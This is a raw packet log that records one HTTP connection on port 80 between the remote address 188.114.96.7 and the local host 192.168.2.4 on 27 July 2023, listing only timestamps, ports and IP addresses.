Jul 27, 2023 20:19:23.725869894 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725879908 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725894928 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725919008 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725943089 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725944996 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725965977 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725972891 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725991011 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726016045 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726025105 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726039886 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726063967 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726070881 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726087093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726110935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726135969 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726145029 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726160049 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726174116 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726183891 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726206064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726229906 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726239920 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726254940 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726272106 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726278067 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726300955 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726315022 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726325035 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726349115 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726371050 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726373911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726401091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726416111 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726424932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726449013 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726474047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726480961 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726497889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726506948 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726521969 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726546049 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726569891 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726588011 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726593971 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726619959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726634026 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726644993 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726670027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726670980 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726692915 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726706028 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726716995 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726741076 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726756096 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726764917 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726789951 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726797104 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726813078 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726834059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726856947 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726881027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726887941 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726903915 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726927996 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726943970 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.726953030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726979017 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.726984978 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727003098 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727027893 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727051973 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727066994 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727076054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727099895 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727108002 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727124929 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727149963 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727152109 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727174044 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727193117 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727199078 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727221966 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727229118 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727247000 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727272034 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727294922 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727303028 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727318048 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727332115 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727341890 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727365017 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727387905 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727395058 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727411985 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727421045 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727436066 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727459908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727483034 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727489948 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727507114 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727516890 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727530003 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727554083 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727577925 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727585077 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727602959 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727611065 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727626085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727649927 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727682114 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727688074 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727708101 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727711916 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727731943 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727756977 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727780104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727794886 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727806091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727830887 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727830887 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727857113 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727864981 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727881908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727905989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727921009 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727929115 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727952957 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.727965117 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.727977037 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728002071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728028059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728043079 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728053093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728077888 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728077888 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728102922 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728118896 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728127956 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728152990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728178024 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728178024 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728202105 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728216887 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728226900 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728251934 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728288889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728288889 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728315115 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728329897 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728338957 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728363037 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728382111 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728388071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728413105 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728426933 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728437901 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728456974 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728463888 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728488922 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728497982 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728513956 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728522062 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728539944 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728564024 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728588104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728595018 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728611946 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728619099 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728636026 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728661060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728666067 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728684902 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728708982 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728733063 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728740931 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728760004 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728766918 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728785038 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728809118 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728832960 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728841066 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728857994 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728863955 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728882074 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728905916 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728913069 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.728931904 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728955030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728980064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.728986025 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729002953 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729008913 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729027987 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729053020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729078054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729084969 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729103088 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729111910 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729130030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729152918 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729167938 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729176998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729201078 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729222059 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729226112 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729250908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729275942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729300022 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729325056 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729326010 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729348898 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729368925 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729373932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729397058 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729415894 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729422092 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729445934 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729470015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729489088 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729495049 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729512930 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729520082 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729543924 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729558945 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729568005 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729592085 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729615927 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729615927 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729640961 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729651928 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729664087 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729687929 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729701996 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729712009 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729734898 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729749918 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729758978 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729783058 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729809046 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729825020 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729835987 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729846001 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729860067 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729883909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729893923 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729907990 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729932070 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729947090 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.729958057 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729981899 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.729990959 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730006933 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730031967 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730056047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730070114 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730081081 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730104923 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730123997 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730130911 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730142117 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730155945 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730180979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730204105 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730212927 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730227947 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730242968 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730252028 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730277061 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730299950 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730309010 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730323076 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730334044 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730346918 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730370998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730395079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730405092 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730418921 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730432987 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730443001 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730468035 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730492115 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730500937 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730515003 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730530977 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730539083 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730561972 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730585098 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730596066 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730608940 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730626106 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730633020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730655909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730664968 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730679989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730704069 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730726957 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730741978 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730751038 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730770111 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730773926 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730798006 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730806112 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730820894 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730844975 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730856895 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730869055 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730895042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730917931 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730931997 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730942011 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730957031 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.730964899 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730988979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.730997086 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731013060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731039047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731044054 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731064081 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731086969 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731111050 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731122017 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731137037 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731153965 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731185913 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731211901 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731235027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731245041 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731259108 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731276035 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.731281996 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.731304884 CEST	80	49770	188.114.96.7	192.168.2.4
